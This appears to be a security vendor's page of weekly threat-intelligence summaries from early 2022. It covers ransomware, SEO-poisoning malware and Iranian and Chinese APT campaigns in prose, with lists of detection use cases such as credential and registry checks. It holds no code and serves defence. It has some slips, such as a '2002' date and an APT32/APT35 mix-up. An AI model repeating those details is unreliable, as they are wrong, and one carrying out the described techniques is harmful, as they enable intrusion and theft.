The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

Ransomware Targets European Oil and Chemical Sectors

February 08, 2022

Reported from The Record, a series of ransomware attacks have been targeting oil and chemical suppliers in Belgium, Netherlands and Germany. While the attacks aren’t identified as being linked, European officials investigating the matter have associated the attacks to BlackCat and Conti ransomware groups.

Koxic Ransomware

February 08, 2022

Koxic Ransomware

Industry: N/A | Level: Tactical | Source: Cyble

Research from Cyble Research Labs provides a deep-dive analysis of Koxic ransomware. During malware execution, the sample collects system information and modifies registry keys to assist with lateral movement and tamper with system defenses such as Windows Defender and anti-virus. Any security apps running are terminated and shadow copies are deleted. Prior to ransomware encryption, sensitive information is collected and output to a file in TEMP. Once the desired data is collected, it is exfiltrated to the attacker with the ransomware note distributed to victim hosts on the environment. Encrypted files are appended with the extension “KOXIC_KLIBD.”

  • Anvilogic Scenario: Koxic Ransomware
  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Modify Registry Key
    • Inhibit System Recovery commands
    • Output to File

SEO Poisoning dropping malware

February 08, 2022

SEO Poisoning dropping malware

Industry: N/A | Level: Tactical | Source: Mandiant

Mandiant Managed Defense has identified a threat campaign distributing BATLOADER malware and malicious installations of remote management software, ATERA from crafting website themes with freeware, and using search engine optimization poisoning to lure victims. The malicious webpages incorporate Traffic Direction System (TDS) to verify user attributes determining if the site visitor should be directed to a malicious or legitimate page in order to avoid detection from security researchers. Two different infection chains are utilized for the malware. BATLOADER users attempting to download the alleged software also receive an installer, that runs native tools such as PowerShell, Msiexec.exe, and Mshta.exe in order to evade detection. A notable DLL file, “AppResolver.dll” contains a malicious VBScript that’s executed with Mshta.exe. With the ATERA infection chain, an MSI file is dropped for the ATERA agent to be installed, To maintain persistence the network discovery component of ATERA, Splashtop would also be installed and scripts will be pushed from the agent to tamper with the host by modifying Windows Defender file exclusions and downloading additional payloads. Currently, no known attribution of the activity is determined for a threat actor group, however, there is some overlap in techniques from the leaked Conti playbooks in August 2021.

  • Anvilogic Scenario: Malicious Software Download via MSI
  • Anvilogic Use Cases:
    • MSHTA.exe execution
    • MSIExec Install MSI File
    • Modify Windows Defender

MuddyWater ATP Group

February 08, 2022

MuddyWater ATP Group

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos provided research for the latest threat activity involving the Iranian APT group, MuddyWater that has been attributed to Iran’s Ministry of Intelligence and Security (MOIS). The threat group has been targeting users in Turkey with malicious PDFs, Office documents and Windows executables to establish initial access. With most threat actors, living-off-the-land binaries (LoLBins) are leveraged to evade detection with prominent usage of tools such as VBS scripts and DLLs. Upon execution of the malicious document, persistence is established through the registry key modifications and the group has incorporated canarytokens into its attack scheme. In the VBA code, HTTP requests are made to canarytokens[.]com which provides a notification to the token’s developer when an “object was opened.” The inclusion of the tokens can provide various capabilities to the attack such as the ability to track code execution, anti-analysis method for “timing checks” and “the server that hosts the final payload may only deliver if it first receives two almost simultaneous requests to the token.”

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Wscript/Cscript Execution
    • New AutoRun Registry Key
    • Suspicious Registry Key Created

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Phosphorus/APT32 New PowerLess Trojan

Industry: N/A | Level: Tactical | Source: Cybereason

Iranian group, Phosphorus/APT35/Charming Kitten, has been identified by Research from Cybereason, utilizing new PowerShell tool “PowerLess Backdoor,” while also exploiting log4shell vulnerabilities. The new malware comes with capabilities to download additional payloads for information stealing, however it’s unique with a new stealth technique as detailed from the report, “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn’t prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on reviewed IOCs from Cybereason, the infrastructure utilized for the attack is highly active with an observed IP address having overlap with Memento Ransomware linking a potential connection between the threat actor group and ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell

Antlion APT Group

February 08, 2022

Antlion APT Group

Industry: Financial & Manufacturing | Level: Tactical | Source: Symantec

Symantec reports of threat activity from Antlion, a Chinese state-backed APT group. For the past 18 months, the threat group has been actively targeting Taiwanese financial institutions. The group’s operations involve long dwell times. Recent attacks observed of a financial organization, having been approximately 250 days on the network, and another attack of a manufacturing organization with an observed 175 days. A custom backdoor, xPack is leveraged by the group. Threat activity observed in a case study, identified the group running various commands (example with WMI), exploiting EternalBlue, gathering credentials from the registry, running PsExec and archiving collected data. There are undefined gaps in threat activity, continuing to emphasize the group’s slow methodical pace.

  • Anvilogic Use Cases:
    • WinRM Tools
    • Credentials in Registry
    • Remote Admin Tools
    • Locate Credentials

Gamaredon/ACTINIUM & Ukraine

February 08, 2022

In-depth research, by Palo Alto Unit24 and Microsoft Threat Intelligence Center (MSTIC), found threat group, Gamaredon/ACTINIUM, has been actively targeting organizations in the Ukraine.

Global Affairs Canada Cyberattack

February 01, 2022

Global Affairs Canada Cyberattack

Industry: Government | Level: Strategic | Source: BleepingComputer

Global Affairs Canada (GAC) detected a cyberattack on January 19th, 2022, resulting in network disruptions. The attack was successfully mitigated with critical services continuing to be available however some online services are not, as recovery efforts are still in progress. The GAC manages foreign and consular relations for the Canadian government and the current review of the incident did not identify impact to other government departments.

US Bans China Unicom Americas

February 01, 2022

US Bans “China Unicom Americas”

Industry: Telecommunications | Level: Strategic | Source: BleepingComputer

On January 27th, 2002, the United States Federal Communications Commission (FCC) issued an order for China Unicom Americas to cease its services in the US within 60 days. The decision to revoke the China Unicoms’ subsidiary’s license was cited due to security concerns. In a FCC’s statement, “The Order finds that China Unicom Americas’ ownership and control by the Chinese government raise significant national security and law enforcement risks by providing opportunities for China Unicom Americas, its parent entities, and the Chinese government to access, store, disrupt, and/or misroute US communications, which in turn allow them to engage in espionage and other harmful activities against the United States.”

US Federal Government Initiative to protect Water Systems

February 01, 2022

In an effort, to improve the defense of US critical infrastructure, the US government and the Environmental Protection Agency (EPA) are initiating a new “action plan” focusing on securing the water sector.